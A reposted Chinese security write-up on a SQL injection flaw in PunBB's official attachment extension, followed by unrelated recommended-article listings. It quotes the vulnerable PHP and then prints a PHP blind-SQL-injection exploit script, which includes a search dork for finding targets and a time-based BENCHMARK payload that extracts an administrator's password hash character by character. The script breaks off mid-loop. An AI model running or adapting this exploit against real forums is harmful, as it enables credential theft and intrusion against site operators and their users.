PunBB官方上传附件扩展注射漏洞

作者：手机用户2502853217 | 来源：互联网 | 2017-11-12 01:52

PunBB官方上传附件扩展注射漏洞作者:Ryatif(isset($_GET[secure_str])){if(preg_match(~(\d+)f(\d+)~,$_GET[secure_str],$match)){...WHEREa.AND(fp.read_forumISNULLORfp.read_forum1)ANDsecure_

PunBB官方上传附件扩展注射漏洞

作者:Ryat

if (isset($_GET[\'secure_str\']))  
{  
    if (preg_match(\'~(d+)f(d+)~\', $_GET[\'secure_str\'], $match))  
    {  
    ...  
            \'WHERE\'        => \'a.id = \'.$attach_item.\' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \'\'.$_GET[\'secure_str\'].\'\'\'

挺明显的，应该是对正则表达式及preg_match函数的误用，导致可以通过$_GET[\'secure_str\']来触发sql inj...

另外，在pun_list_attach.php文件还有个注射，不过需要后台权限，有兴趣的同学自己看，那个要更明显些:)

最后给个PoC性质的EXP，具体效果和利用方式就别问我了...

#!/usr/bin/php  
 
print_r(\'  
+---------------------------------------------------------------------------+  
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit  
by puret_t  
mail: puretot at gmail dot com  
team: http://www.wolvez.org  
dork: "Powered by PunBB" 
+---------------------------------------------------------------------------+  
\');  
/**  
 * works regardless of php.ini settings  
 */ 
if ($argc < 3) {  
    print_r(\'  
+---------------------------------------------------------------------------+  
Usage: php \'.$argv[0].\' host path  
host:      target server (ip/hostname)  
path:      path to punbb  
Example:  
php \'.$argv[0].\' localhost /punbb/  
+---------------------------------------------------------------------------+  
\');  
    exit;  
}  
 
error_reporting(7);  
ini_set(\'max_execution_time\', 0);  
 
$host = $argv[1];  
$path = $argv[2];  
 
$pre = \'pun_\';  
 
$benchmark = 200000000;  
$timeout = 10;  
 
echo "Plz Waiting...nPassword:n";  
/**  
 * get pass  
 */ 
$j = 1;  
$pass = \'\';  
 
$hash[0] = 0; //null  
$hash = array_merge($hash, range(48, 57)); //numbers  
$hash = array_merge($hash, range(97, 122)); //a-z letters  
 
while (strlen($pass) < 40) {  
    for ($i = 0; $i <= 255; $i ++) {  
        if (in_array($i, $hash)) {  
            $cmd = \'1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20\'.$pre.\'users%20WHERE%20group_id=1%20LIMIT%201),\'.$j.\',1))=\'.$i.\'),BENCHMARK(\'.$benchmark.\',CHAR(0)),1))%23\';  
            send();  
            usleep(2000000);

推荐阅读

python
如何实现织梦DedeCms全站伪静态

本文介绍了如何通过修改织梦DedeCms源代码来实现全站伪静态，以提高管理和SEO效果。全站伪静态可以避免重复URL的问题，同时通过使用mod_rewrite伪静态模块和.htaccess正则表达式，可以更好地适应搜索引擎的需求。文章还提到了一些相关的技术和工具，如Ubuntu、qt编程、tomcat端口、爬虫、php request根目录等。 ... [详细]

蜡笔小新 2023-12-14 19:45:47
get
SQL日志收缩及截断方法详解

本文详细介绍了SQL日志收缩的方法，包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时，还介绍了截断日志的原理和注意事项，包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法，可以有效减小逻辑日志的大小，提高数据库的性能。 ... [详细]

蜡笔小新 2023-12-14 18:23:25
timestamp
Android 新闻App的本地服务器搭建教程

本文介绍了在开发Android新闻App时，搭建本地服务器的步骤。通过使用XAMPP软件，可以一键式搭建起开发环境，包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表，并设置相应的属性。最后，给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]

蜡笔小新 2023-12-14 17:15:19
string
Python高级之网络编程及TCP/IP协议簇的OSI七层模型介绍

本文介绍了Python高级网络编程及TCP/IP协议簇的OSI七层模型。首先简单介绍了七层模型的各层及其封装解封装过程。然后讨论了程序开发中涉及到的网络通信内容，主要包括TCP协议、UDP协议和IPV4协议。最后还介绍了socket编程、聊天socket实现、远程执行命令、上传文件、socketserver及其源码分析等相关内容。 ... [详细]

蜡笔小新 2023-12-14 18:16:27
python
Python3中选择文件对话框的格式打开和保存图片

本文介绍了在Python3中如何使用选择文件对话框的格式打开和保存图片的方法。通过使用tkinter库中的filedialog模块的asksaveasfilename和askopenfilename函数，可以方便地选择要打开或保存的图片文件，并进行相关操作。具体的代码示例和操作步骤也被提供。 ... [详细]

蜡笔小新 2023-12-14 17:46:55
python
第一次参加比赛的经历和感受

本文描述了作者第一次参加比赛的经历和感受。作者是小学六年级时参加比赛的唯一选手，感到有些紧张。在比赛期间，作者与学长学姐一起用餐，在比赛题目中遇到了一些困难，但最终成功解决。作者还尝试了一款游戏，在回程的路上感到晕车。最终，作者以110分的成绩取得了省一会的资格，并坚定了继续学习的决心。 ... [详细]

蜡笔小新 2023-12-14 17:42:14
jsp
基于layUI的图片上传前预览功能的2种实现方式

本文介绍了基于layUI的图片上传前预览功能的两种实现方式：一种是使用blob+FileReader，另一种是使用layUI自带的参数。通过选择文件后点击文件名，在页面中间弹窗内预览图片。其中，layUI自带的参数实现了图片预览功能。该功能依赖于layUI的上传模块，并使用了blob和FileReader来读取本地文件并获取图像的base64编码。点击文件名时会执行See()函数。摘要长度为169字。 ... [详细]

蜡笔小新 2023-12-14 17:06:58
get
搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的详细步骤

本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的步骤，包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]

蜡笔小新 2023-12-14 17:03:58
get
PHP图片截取方法及应用实例

本文介绍了使用PHP动态切割JPEG图片的方法，并提供了应用实例，包括截取视频图、提取文章内容中的图片地址、裁切图片等问题。详细介绍了相关的PHP函数和参数的使用，以及图片切割的具体步骤。同时，还提供了一些注意事项和优化建议。通过本文的学习，读者可以掌握PHP图片截取的技巧，实现自己的需求。 ... [详细]

蜡笔小新 2023-12-14 16:44:09
get
关羽败走麦城时路过马超封地马超为何没有出手救人

对当年关羽败走麦城，恰好路过马超的封地，为啥马超不救他?很感兴趣的小伙伴们，趣历史小编带来详细的文章供大家参考。说到英雄好汉，便要提到一本名著了，没错，那就是《三国演义》。书中虽 ... [详细]

蜡笔小新 2023-12-14 16:29:09
object
C#学习教程：在Console中工作但在Windows窗体中不工作的异步代码分享

本文分享了一个关于在C#中使用异步代码的问题，作者在控制台中运行时代码正常工作，但在Windows窗体中却无法正常工作。作者尝试搜索局域网上的主机，但在窗体中计数器没有减少。文章提供了相关的代码和解决思路。 ... [详细]

蜡笔小新 2023-12-14 15:56:00
jsp
Java实现大数乘法（分治算法）

本文介绍了使用Java实现大数乘法的分治算法，包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]

蜡笔小新 2023-12-14 15:43:50
jsp
PHP设置MySQL字符集的方法及使用mysqli_set_charset函数

本文介绍了PHP设置MySQL字符集的方法，详细介绍了使用mysqli_set_charset函数来规定与数据库服务器进行数据传送时要使用的字符集。通过示例代码演示了如何设置默认客户端字符集。 ... [详细]

蜡笔小新 2023-12-14 15:30:33
object
Java序列化对象传给PHP的方法及原理解析

本文介绍了Java序列化对象传给PHP的方法及原理，包括Java对象传递的方式、序列化的方式、PHP中的序列化用法介绍、Java是否能反序列化PHP的数据、Java序列化的原理以及解决Java序列化中的问题。同时还解释了序列化的概念和作用，以及代码执行序列化所需要的权限。最后指出，序列化会将对象实例的所有字段都进行序列化，使得数据能够被表示为实例的序列化数据，但只有能够解释该格式的代码才能够确定数据的内容。 ... [详细]

蜡笔小新 2023-12-14 15:25:15
object
橱窗设计的表现手法及其应用

本文介绍了橱窗设计的表现手法，包括直接展示、寓意与联想、夸张与幽默等。通过对商品的折、拉、叠、挂、堆等陈列技巧，橱窗设计能够充分展现商品的形态、质地、色彩、样式等特性。同时，寓意与联想可以通过象形形式或抽象几何道具来唤起消费者的联想与共鸣，创造出强烈的时代气息和视觉空间。合理的夸张和贴切的幽默能够明显夸大商品的美的因素，给人以新颖奇特的心理感受，引起人们的笑声和思考。通过这些表现手法，橱窗设计能够有效地传达商品的个性内涵，吸引消费者的注意力。 ... [详细]

蜡笔小新 2023-12-14 15:14:03

手机用户2502853217

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章